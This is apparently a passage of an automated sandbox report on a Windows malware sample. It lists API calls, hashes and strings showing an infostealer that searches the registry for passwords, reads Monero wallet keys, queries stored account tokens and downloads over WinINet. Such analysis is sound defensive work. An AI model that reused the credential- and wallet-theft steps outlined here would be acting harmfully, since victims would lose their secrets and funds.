                              • Associated: 00000000.00000002.2257198305.0000000000A12000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257198305.0000000000B7A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000B8E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000D12000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000DF1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000E13000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000E1A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000E29000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257627085.0000000000E2A000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257732387.0000000000FC4000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257750006.0000000000FC5000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_930000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                              • String ID:
                              • API String ID: 2507841554-0
                              • Opcode ID: 54bcc6a3f8ecb9d6a785a61451ad29bb9950dc2cf6f50c11704cd22a97bc5c1e
                              • Instruction ID: 18b475e5c52ce719fc412b8c57782533c74d9b380f2c3a393bfd4b5e98a97139
                              • Opcode Fuzzy Hash: 54bcc6a3f8ecb9d6a785a61451ad29bb9950dc2cf6f50c11704cd22a97bc5c1e
                              • Instruction Fuzzy Hash: EB5150B1940218ABEB24DF90DC45FEE77B8EB84705F108498F609A71C1DB74AE85CFA5
                              APIs
                              • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0093733A
                              • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 009373B1
                              • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0093740D
                              • GetProcessHeap.KERNEL32(00000000,?), ref: 00937452
                              • HeapFree.KERNEL32(00000000), ref: 00937459
                              • task.LIBCPMTD ref: 00937555
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257198305.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                              • Associated: 00000000.00000002.2257183629.0000000000930000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257198305.00000000009E1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257198305.00000000009ED000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257198305.0000000000A12000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257198305.0000000000B7A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000B8E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000D12000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000DF1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000E13000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000E1A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000E29000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257627085.0000000000E2A000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257732387.0000000000FC4000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257750006.0000000000FC5000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_930000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$EnumFreeOpenProcessValuetask
                              • String ID: Password
                              • API String ID: 775622407-3434357891
                              • Opcode ID: 32ad7f72715e59e818b80398ae87e487bad465dd21286e6336c311c69a937729
                              • Instruction ID: a01cd4bbdf2d3ec8be69b8b4c95613b8877e3545dbc0857546d4a99ea5c42c47
                              • Opcode Fuzzy Hash: 32ad7f72715e59e818b80398ae87e487bad465dd21286e6336c311c69a937729
                              • Instruction Fuzzy Hash: C4610CB590425C9BDB24DB50DD45BDAB7B8BF84304F0081E9E689A6141DF706FC9CF91
                              APIs
                                • Part of subcall function 0094A740: lstrcpy.KERNEL32(00950E17,00000000), ref: 0094A788
                                • Part of subcall function 0094A9B0: lstrlen.KERNEL32(?,010F8A98,?,\Monero\wallet.keys,00950E17), ref: 0094A9C5
                                • Part of subcall function 0094A9B0: lstrcpy.KERNEL32(00000000), ref: 0094AA04
                                • Part of subcall function 0094A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0094AA12
                                • Part of subcall function 0094A920: lstrcpy.KERNEL32(00000000,?), ref: 0094A972
                                • Part of subcall function 0094A920: lstrcat.KERNEL32(00000000), ref: 0094A982
                                • Part of subcall function 0094A8A0: lstrcpy.KERNEL32(?,00950E17), ref: 0094A905
                                • Part of subcall function 0094A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0094A7E6
                              • lstrlen.KERNEL32(00000000), ref: 0093BC9F
                                • Part of subcall function 00948E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00948E52
                              • StrStrA.SHLWAPI(00000000,AccountId), ref: 0093BCCD
                              • lstrlen.KERNEL32(00000000), ref: 0093BDA5
                              • lstrlen.KERNEL32(00000000), ref: 0093BDB9
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257198305.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                              • Associated: 00000000.00000002.2257183629.0000000000930000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257198305.00000000009E1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257198305.00000000009ED000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257198305.0000000000A12000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257198305.0000000000B7A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000B8E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000D12000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000DF1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000E13000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000E1A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000E29000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257627085.0000000000E2A000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257732387.0000000000FC4000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257750006.0000000000FC5000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_930000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                              • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                              • API String ID: 3073930149-1079375795
                              • Opcode ID: 47c537cd11da3c7be5e30773c91bfa169fb18e9d6fec4310d3888bf62f1b9ffd
                              • Instruction ID: 7e6bbebbf11fc6a4978f26e091f0356ef821848f9cd5d54b31cf230e4888db14
                              • Opcode Fuzzy Hash: 47c537cd11da3c7be5e30773c91bfa169fb18e9d6fec4310d3888bf62f1b9ffd
                              • Instruction Fuzzy Hash: 49B14F72950108ABEB14FBA0DC96FEE7339EF94304F404558F506A7191EF346E49CBA6
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257198305.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                              • Associated: 00000000.00000002.2257183629.0000000000930000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257198305.00000000009E1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257198305.00000000009ED000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257198305.0000000000A12000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257198305.0000000000B7A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000B8E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000D12000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000DF1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000E13000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000E1A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000E29000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257627085.0000000000E2A000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257732387.0000000000FC4000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257750006.0000000000FC5000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_930000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExitProcess$DefaultLangUser
                              • String ID: *
                              • API String ID: 1494266314-163128923
                              • Opcode ID: 872c343b34161eebcfab5d88777b38f21099c7f00402f2cd3478d1871aeed9b6
                              • Instruction ID: 6cea885e9e9763fa506887a533aa9cc9f5c447493edcbe045ce7fb046804b304
                              • Opcode Fuzzy Hash: 872c343b34161eebcfab5d88777b38f21099c7f00402f2cd3478d1871aeed9b6
                              • Instruction Fuzzy Hash: E6F05E70908209EFD3889FE0E909B2C7B74FB45703F040198E60D87290DA745F829B97
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00934FCA
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00934FD1
                              • InternetOpenA.WININET(00950DDF,00000000,00000000,00000000,00000000), ref: 00934FEA
                              • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00935011
                              • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00935041
                              • InternetCloseHandle.WININET(?), ref: 009350B9
                              • InternetCloseHandle.WININET(?), ref: 009350C6
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257198305.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                              • Associated: 00000000.00000002.2257183629.0000000000930000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257198305.00000000009E1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257198305.00000000009ED000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257198305.0000000000A12000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257198305.0000000000B7A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000B8E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000D12000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000DF1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000E13000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000E1A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000E29000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257627085.0000000000E2A000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257732387.0000000000FC4000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257750006.0000000000FC5000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_930000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                              • String ID:
                              • API String ID: 3066467675-0
                              • Opcode ID: 8f696a8f1344d2f9acd573e6bf9023cafd39abfdd8873cb4b853a890bd4341b1
                              • Instruction ID: edf1c22dc5fb554e36f726ffc3feaebabe6d9c8ea52644d1ddca4bbac48b76b8
                              • Opcode Fuzzy Hash: 8f696a8f1344d2f9acd573e6bf9023cafd39abfdd8873cb4b853a890bd4341b1
                              • Instruction Fuzzy Hash: 653119B4A40218ABDB24CF54DC85BDCB7B4EB88704F1081D8FA09A7280DB746EC58F99
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,010FDAF8,00000000,?,00950E2C,00000000,?,00000000), ref: 00948130
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00948137
                              • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00948158
                              • wsprintfA.USER32 ref: 009481AC
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257198305.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                              • Associated: 00000000.00000002.2257183629.0000000000930000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257198305.00000000009E1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257198305.00000000009ED000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257198305.0000000000A12000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257198305.0000000000B7A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000B8E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000D12000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000DF1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000E13000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000E1A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000E29000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257627085.0000000000E2A000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257732387.0000000000FC4000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257750006.0000000000FC5000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_930000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateGlobalMemoryProcessStatuswsprintf
                              • String ID: %d MB$@
                              • API String ID: 2922868504-3474575989
                              • Opcode ID: 9f30998a15c3ca47ae9a3de843b8c4714630a91ef4359eb4781c9eb07b7477aa
                              • Instruction ID: 88aa9ccf6dfc2862786d6957686e13484d38c00e966458828e76932e676f4886
                              • Opcode Fuzzy Hash: 9f30998a15c3ca47ae9a3de843b8c4714630a91ef4359eb4781c9eb07b7477aa
                              • Instruction Fuzzy Hash: C421FEB1E44218ABDB00DFD5DC49FAFB7B8FB88B14F104519F605BB280DB7869018BA5
                              APIs
                              • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00948426
                              • wsprintfA.USER32 ref: 00948459
                              • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0094847B
                              • RegCloseKey.ADVAPI32(00000000), ref: 0094848C
                              • RegCloseKey.ADVAPI32(00000000), ref: 00948499
                                • Part of subcall function 0094A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0094A7E6
                              • RegQueryValueExA.ADVAPI32(00000000,010FDAE0,00000000,000F003F,?,00000400), ref: 009484EC
                              • lstrlen.KERNEL32(?), ref: 00948501
                              • RegQueryValueExA.ADVAPI32(00000000,010FDC48,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00950B34), ref: 00948599
                              • RegCloseKey.ADVAPI32(00000000), ref: 00948608
                              • RegCloseKey.ADVAPI32(00000000), ref: 0094861A
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257198305.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                              • Associated: 00000000.00000002.2257183629.0000000000930000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257198305.00000000009E1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257198305.00000000009ED000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257198305.0000000000A12000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257198305.0000000000B7A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000B8E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000D12000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000DF1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000E13000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000E1A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000E29000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257627085.0000000000E2A000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257732387.0000000000FC4000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257750006.0000000000FC5000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_930000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                              • String ID: %s\%s
                              • API String ID: 3896182533-4073750446
                              • Opcode ID: 2faf2d7e71e690e97b99da330024e7815e1d8f6fda5e77046e9d7664cdbdd126
                              • Instruction ID: c279d307341c546c139fcc1f9e2b5bf024ed3a76039cdaa74fec16845889a1ab
                              • Opcode Fuzzy Hash: 2faf2d7e71e690e97b99da330024e7815e1d8f6fda5e77046e9d7664cdbdd126
                              • Instruction Fuzzy Hash: F821E7B1950218ABDB64DB54DC85FE9B3B8FB88704F00C598E609A7180DF71AA85CFD5
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 009476A4
                              • RtlAllocateHeap.NTDLL(00000000), ref: 009476AB
                              • RegOpenKeyExA.ADVAPI32(80000002,010EB760,00000000,00020119,00000000), ref: 009476DD
                              • RegQueryValueExA.ADVAPI32(00000000,010FDD08,00000000,00000000,?,000000FF), ref: 009476FE
                              • RegCloseKey.ADVAPI32(00000000), ref: 00947708
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257198305.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                              • Associated: 00000000.00000002.2257183629.0000000000930000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257198305.00000000009E1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257198305.00000000009ED000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257198305.0000000000A12000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257198305.0000000000B7A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000B8E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000D12000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000DF1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000E13000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000E1A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000E29000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257627085.0000000000E2A000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257732387.0000000000FC4000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257750006.0000000000FC5000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_930000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID: Windows 11
                              • API String ID: 3225020163-2517555085
                              • Opcode ID: bede20ba15109c0659173b02a57f68f5196b292f9e2297d0bdc772ca0afbcee0
                              • Instruction ID: 5f9b5a8ebc127afed2614fbeef4c67ac4873f25543e51646a63307c4c752567f
                              • Opcode Fuzzy Hash: bede20ba15109c0659173b02a57f68f5196b292f9e2297d0bdc772ca0afbcee0
                              • Instruction Fuzzy Hash: 02014FB5A44208BBDB00DBE4DC59F6DB7BCEB88701F104454FA0897291EB7499448B52
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00947734
                              • RtlAllocateHeap.NTDLL(00000000), ref: 0094773B
                              • RegOpenKeyExA.ADVAPI32(80000002,010EB760,00000000,00020119,009476B9), ref: 0094775B
                              • RegQueryValueExA.ADVAPI32(009476B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 0094777A
                              • RegCloseKey.ADVAPI32(009476B9), ref: 00947784
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257198305.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                              • Associated: 00000000.00000002.2257183629.0000000000930000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257198305.00000000009E1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257198305.00000000009ED000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257198305.0000000000A12000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257198305.0000000000B7A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000B8E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000D12000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000DF1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000E13000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000E1A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000E29000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257627085.0000000000E2A000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257732387.0000000000FC4000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257750006.0000000000FC5000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_930000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID: CurrentBuildNumber
                              • API String ID: 3225020163-1022791448
                              • Opcode ID: 438eb817bceb6ba0e5b950d85feb736e8882bd4afd5d57c14059b01128c3c6ea
                              • Instruction ID: cd03750ae59f274a97928e6944c9052fb6d9e7488645c4408506e481f81d07bc
                              • Opcode Fuzzy Hash: 438eb817bceb6ba0e5b950d85feb736e8882bd4afd5d57c14059b01128c3c6ea
                              • Instruction Fuzzy Hash: FF0117F5A40308BBD750DFE4DC49FAEB7B8EB84705F104555FA09A72C1DB705A408B52
                              APIs
                              • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 009399EC
                              • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00939A11
                              • LocalAlloc.KERNEL32(00000040,?), ref: 00939A31
                              • ReadFile.KERNEL32(000000FF,?,00000000,0093148F,00000000), ref: 00939A5A
                              • LocalFree.KERNEL32(0093148F), ref: 00939A90
                              • CloseHandle.KERNEL32(000000FF), ref: 00939A9A
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257198305.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                              • Associated: 00000000.00000002.2257183629.0000000000930000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257198305.00000000009E1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257198305.00000000009ED000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257198305.0000000000A12000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257198305.0000000000B7A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000B8E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000D12000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000DF1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000E13000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000E1A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000E29000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257627085.0000000000E2A000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257732387.0000000000FC4000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257750006.0000000000FC5000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_930000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                              • String ID:
                              • API String ID: 2311089104-0
                              • Opcode ID: 61e133aef6c726cb3e149aa5816c1413b27bce4d24682f699fd871cfa03f35b6
                              • Instruction ID: 274620ba0bfc716ec1011ac9a8704f8d4a342d41135a41948a8dbe0cc225881f
                              • Opcode Fuzzy Hash: 61e133aef6c726cb3e149aa5816c1413b27bce4d24682f699fd871cfa03f35b6
                              • Instruction Fuzzy Hash: 74311C74A00209EFDF14DF94D985FAE77B9FF88341F108258E915A7290DB74AA81CFA1
                              APIs
                              • lstrcat.KERNEL32(?,010FDE88), ref: 009447DB
                                • Part of subcall function 00948DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00948E0B
                              • lstrcat.KERNEL32(?,00000000), ref: 00944801
                              • lstrcat.KERNEL32(?,?), ref: 00944820
                              • lstrcat.KERNEL32(?,?), ref: 00944834
                              • lstrcat.KERNEL32(?,010EB188), ref: 00944847
                              • lstrcat.KERNEL32(?,?), ref: 0094485B
                              • lstrcat.KERNEL32(?,010FD340), ref: 0094486F
                                • Part of subcall function 0094A740: lstrcpy.KERNEL32(00950E17,00000000), ref: 0094A788
                                • Part of subcall function 00948D90: GetFileAttributesA.KERNEL32(00000000,?,00931B54,?,?,0095564C,?,?,00950E1F), ref: 00948D9F
                                • Part of subcall function 00944570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00944580
                                • Part of subcall function 00944570: RtlAllocateHeap.NTDLL(00000000), ref: 00944587
                                • Part of subcall function 00944570: wsprintfA.USER32 ref: 009445A6
                                • Part of subcall function 00944570: FindFirstFileA.KERNEL32(?,?), ref: 009445BD
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257198305.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                              • Associated: 00000000.00000002.2257183629.0000000000930000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257198305.00000000009E1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257198305.00000000009ED000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257198305.0000000000A12000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257198305.0000000000B7A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000B8E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000D12000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000DF1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000E13000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000E1A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000E29000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257627085.0000000000E2A000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257732387.0000000000FC4000.00000040.00000001.01000000.00000003.sdmp
